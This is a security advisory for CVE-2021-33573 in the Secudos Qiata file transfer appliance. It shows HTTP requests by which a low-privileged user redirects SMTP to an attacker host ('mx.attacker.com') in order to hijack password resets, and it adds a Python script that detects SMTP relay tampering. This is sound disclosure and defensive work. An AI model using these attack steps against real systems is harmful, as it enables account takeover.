SECUDOS Qiata FTA mail settings access control vulnerability
William Söderberg
Published: 24 Aug 2021
CVE-2021-33573
2021-04-14 | Notified Secudos about the identified vulnerability
2021-04-15 | Vendor acknowledged issue
2021-04-26 | Patch released in version 2.21.0
2021-08-24 | F-Secure publishes advisory
F-Secure identified an access control vulnerability in the Secudos Qiata File Transfer Appliance (FTA). This issue could allow a low privileged attacker to escalate their privileges on the system and gain unauthorized access to files and functionality.
Secudos describes the software as follows: “Qiata File Transfer Appliances (FTAs) provide the ability to easily and securely exchange files with internal or external users. Qiata is a user-friendly solution in the form of a specialized web application that is optimized for the task of file transfer. Qiata is not some service on the internet. Qiata is an appliance solution that operates within the enterprise itself.”
F-Secure found that both low privileged internal and external users could change the SMTP settings of the FTA.
Low privileged users can escalate privileges in the system. By changing the SMTP settings to send e-mails to an attacker controlled server, the attacker can initiate a password reset for a victim user, view the reset e-mail, and subsequently change the victim user’s password.
In order to carry out the attack, the attacker must first be authenticated to the system. In a plausible narrative, the attacker might have received a link to a file sent from the FTA, providing an external user session on the Qiata FTA:
GET /cgi-bin/login.fcgi?link=d7d2d6c1-67f1-4f81-839a-73aca4d405b9 HTTP/1.1
Host: 192.168.17.128
The response body contains the “tokenValue”, which serves as a session identifier on the FTA:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-UA-Compatible: IE=EDGE
Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure
Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure
Set-Cookie: FTAUser=8ddd3e2b-73a4-4949-8173-908e38aa7f19;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 12416
Using this session, the current SMTP settings are requested from the transfers endpoint:
POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1
Host: 192.168.17.128
Content-Length: 645
X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19
Content-Type: text/xml
Accept: */*
This returns the SMTP settings including the existing SMTP server address (“smtpAddress”) as seen below:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Length: 558
Connection: close
Content-Type: text/xml
The SMTP settings are then updated to send e-mails to an attacker controlled server (“mx.attacker.com”):
POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1
Host: 192.168.17.128
Content-Length: 645
X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19
Content-Type: text/xml
Accept: */*
The 200 response code and the response body confirm that these details have been updated:
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 491
With the server reconfigured, the attacker can now initiate a password reset for a target user, gaining access to their account. Once the attack has concluded, the same attack vector can be used to change back the SMTP settings in order to avoid raising suspicion.
Restrict outbound SMTP traffic from the FTA to the Internet, and only permit SMTP traffic to whitelisted destinations.
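Because the attacker can restore the original SMTP settings after the password reset, a point-in-time review of the configuration may miss the abuse. The following is an added monitoring example (not Secudos code and not part of the advisory) that parses the XML settings response, compares “smtpAddress” against an approved relay list, and reports every change across periodic polls, including a reverted one. The XML layout of the real transfers.fcgi response is not reproduced in the advisory, so the sample bodies and the approved relay name (mail.corp.example) are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Approved outbound relay(s) for this FTA. Hypothetical value, not from the advisory.
EXPECTED_SMTP = {"mail.corp.example"}


def extract_smtp_address(xml_body: str):
    """Pull the smtpAddress value out of a settings response.

    The advisory only states that the body contains "smtpAddress"; whether it is
    an element or an attribute is an assumption, so both shapes are accepted.
    """
    root = ET.fromstring(xml_body)
    el = root.find(".//smtpAddress")
    if el is not None and el.text and el.text.strip():
        return el.text.strip()
    for node in root.iter():
        if "smtpAddress" in node.attrib:
            return node.attrib["smtpAddress"].strip()
    return None


def check_smtp_settings(xml_body: str, expected=EXPECTED_SMTP):
    """Classify one settings response as ('ok'|'alert'|'error', detail)."""
    try:
        addr = extract_smtp_address(xml_body)
    except ET.ParseError as exc:
        return ("error", f"unparseable response: {exc}")
    if addr is None:
        return ("error", "smtpAddress not present in response")
    if addr.lower() in {e.lower() for e in expected}:
        return ("ok", addr)
    return ("alert", f"smtpAddress changed to {addr}")


def drift_events(observations, expected=EXPECTED_SMTP):
    """Given [(timestamp, xml_body), ...] from periodic polls, return every poll
    that is not 'ok' plus the first 'ok' poll after a problem, so a tampered relay
    that was later changed back still shows up as two events."""
    events, last = [], None
    for ts, body in observations:
        status, detail = check_smtp_settings(body, expected)
        if status != "ok" or (last is not None and last != "ok"):
            events.append((ts, status, detail))
        last = status
    return events


# Constructed sample bodies standing in for real transfers.fcgi responses.
BASELINE = "<response><data><smtpAddress>mail.corp.example</smtpAddress></data></response>"
TAMPERED = "<response><data><smtpAddress>mx.attacker.com</smtpAddress></data></response>"

if __name__ == "__main__":
    for event in drift_events([("t0", BASELINE), ("t1", TAMPERED), ("t2", BASELINE)]):
        print(event)
```

Run the poll with an administrative session on a short interval and feed the bodies to drift_events; the egress restriction above limits the impact, this check surfaces the attempt.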